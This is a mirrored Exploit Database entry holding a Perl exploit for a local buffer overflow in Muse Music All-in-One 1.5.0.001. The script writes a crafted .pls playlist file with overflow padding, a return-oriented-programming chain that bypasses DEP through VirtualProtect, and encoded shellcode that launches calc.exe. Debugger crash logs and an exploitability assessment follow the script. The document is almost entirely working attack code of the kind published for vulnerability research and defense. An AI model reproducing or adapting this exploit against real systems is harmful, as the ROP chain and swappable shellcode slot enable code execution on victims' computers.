Muse Music All-in-One 1.5.0.001 – ‘.pls’ Local Buffer Overflow (DEP Bypass)

• Exploit Database
• 104 阅读

• 作者： C4SS!0 G0M3S
  日期： 2011-09-26
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17892/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180

  #!/usr/bin/perl # #[+]Exploit Title: Muse Music All-In-One PLS File Buffer Overflow Exploit(DEP Bypass) #[+]Date: 25\09\2011(DD\MM\YYYY) #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://download.cnet.com/Muse-Music-All-In-One/3000-2141_4-10070288.html #[+]Version: 1.5.0.001 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # #[+]Info: #This exploit can be universal, if the buffer to overwrite EIP stay for all Windows systems equal. ;) #To reproduce click in File -> Open... -> Select Exploit.pls and see the Calc. #   use strict; use warnings;   print q{ Created By C4SS!0 G0M3S E-mail netfuzzer@hotmail.com Blog net-fuzzer.blogspot.com }; print "\n\t\t[+]Creating Exploit File...\n"; sleep(2);   ##########################ROP START HERE############################################### my $rop = pack('V',0x0043bc93); # POP EAX # RETN $rop .= "AAAA" x 4; # JUNK $rop .= pack('V',0x00339014); # PTR to a Call DWORD for LoadLibraryA $rop .= pack('V',0x1002042f); # POP EBP # RETN $rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of LoadLibraryA $rop .= pack('V',0x100255d1); # POP ESI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == LoadLibraryA $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x004a296c); # RETN $rop .= pack('V',0x004b0519); # PUSHAD # RETN $rop .= "kernel32.dll\x00"; $rop .= "A" x 35; # JUNK #############################Call GetProcAddress################################### $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress $rop .= pack('V',0x100255d1); # POP ESI # RETN $rop .= pack('V',0x0044387e); # ADD ESP,40 # RETN == Return of GetProcAddress $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x004b9563); # XCHG EAX,EBP # RETN $rop .= pack('V',0x0043bc93); # POP EAX # RETN $rop .= pack('V',0x00339010); # PTR to GetProcAddress $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x003367C1); # JMP [EAX] // Jump to [DWORD EAX] == GetProcAddress $rop .= pack('V',0x004b0519); # PUSHAD # RETN $rop .= "VirtualProtect\x00"; $rop .= "A" x 33; # JUNK #############################Call VirtualProtect#################################### $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x00432a42); # PUSH ESP # POP EDI # XOR EAX,EAX # POP ESI # RETN 08 $rop .= "VVVV"; # JUNK $rop .= pack('V',0x004a296c) x 3; # RETN $rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN $rop .= pack('V',0x0043bc93); # POP EAX # RETN $rop .= pack('V',0x00000040); # Value of flNewProtect $rop .= pack('V',0x00478695); # XCHG EAX,EDX # RETN $rop .= pack('V',0x10018000); # XOR EAX,EAX # RETN $rop .= pack('V',0x1001433f); # ADD EAX,EDI # POP EDI # POP ESI # RETN $rop .= "A" x 8; # JUNK $rop .= pack('V',0x1002028b); # POP ECX # RETN $rop .= "\x00\x00\x00\x00"; $rop .= pack('V',0x1000B6ED); # ADD ECX,EAX # MOV DWORD PTR DS:[10085B38],ECX # RETN $rop .= pack('V',0x004b2507); # XCHG EAX,EBX # RETN $rop .= pack('V',0x1002042f); # POP EBP # RETN $rop .= pack('V',0x10012107); # PUSH ESP # RETN == Return of VirtualProtect $rop .= pack('V',0x004a05b8); # POP EBX # RETN $rop .= pack('V',0x00000500); # Value of dwSize $rop .= pack('V',0x004b2c56); # XCHG EAX,ESI # RETN $rop .= pack('V',0x004a296b); # POP EDI # RETN $rop .= pack('V',0x004a296c); # RETN $rop .= pack('V',0x004b0519); # PUSHAD # RETN ##########################ROP END HERE################################################# my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" . "\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" . "\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" . "\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" . "\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" . "\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" . "\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" . "\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe" "\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff" "\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" . "\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" . "\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" . "\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" . "\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" . "\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" . "\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81"; my $buf = "A" x 1300; $buf .= $rop; $buf .= "\x90" x 10; $buf .= $shellcode; $buf .= "A" x 2000;   open(my $file,">Exploit.pls") or die "[-]Error: $!\n"; print $file $buf; close $file; print "\t\t[+]File Exploit.pls Created Successfully.\n"; sleep(1); =head (8f4.8f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000041 ebx=0000007b ecx=ffffffff edx=00000002 esi=00130000 edi=77c3fce0 eip=77c24609 esp=0012ea1c ebp=0012ec34 iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\WINDOWS\system32\msvcrt.dll - msvcrt!wscanf+0x2343: 77c24609 8806mov byte ptr [esi],alds:0023:00130000=41 0:000> .exr -1 ExceptionAddress: 77c24609 (msvcrt!wscanf+0x00002343) ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000001 Parameter[1]: 00130000 Attempt to write to address 00130000 0:000> .lastevent Last event: 8f4.8f8: Access violation - code c0000005 (first chance) debugger time: Sun Sep 25 19:22:13.937 2011 (UTC - 3:00) 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0012ec34 77c212df msvcrt!wscanf+0x2343 *** WARNING: Unable to verify checksum for Muse.exe *** ERROR: Symbol file could not be found.Defaulted to export symbols for Muse.exe - 0012ec70 00498d3a msvcrt!fscanf+0x28 0012eca4 7c91a3cb Muse!CSdll::operator=+0x974fa 0012ecb8 7c91a351 ntdll!RtlpUnWaitCriticalSection+0x86c 00000000 00000000 ntdll!RtlpUnWaitCriticalSection+0x7f2 0:000> g (8f4.8f8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000 eip=41414141 esp=0012e64c ebp=0012e66c iopl=0 nv up ei pl zr na pe nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010246 41414141 ????? 0:000> !load winext/msec.dll 0:000> !exploitable -v HostMachine\HostUser Executing Processor Architecture is x86 Debuggee is in User Mode Debuggee is a live user mode debugging session on the local machine Event Type: Exception Exception Faulting Address: 0x41414141 First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception Sub-Type: Read Access Violation   Exception Hash (Major/Minor): 0x71174239.0x2a6b1069   Stack Trace: Unknown ntdll!RtlConvertUlongToLargeInteger+0x6a ntdll!RtlConvertUlongToLargeInteger+0x3c ntdll!KiUserExceptionDispatcher+0xe msvcrt!fscanf+0x28 Muse!CSdll::operator=+0x974fa ntdll!RtlpUnWaitCriticalSection+0x86c ntdll!RtlpUnWaitCriticalSection+0x7f2 Instruction Address: 0x0000000041414141   Description: Read Access Violation at the Instruction Pointer Short Description: ReadAVonIP Exploitability Classification: EXPLOITABLE Recommended Bug Title: Exploitable - Read Access Violation at the Instruction Pointer starting at Unknown Symbol @ 0x0000000041414141 called from ntdll!RtlConvertUlongToLargeInteger+0x000000000000006a (Hash=0x71174239.0x2a6b1069)   Access violations at the instruction pointer are exploitable if not near NULL.   =cut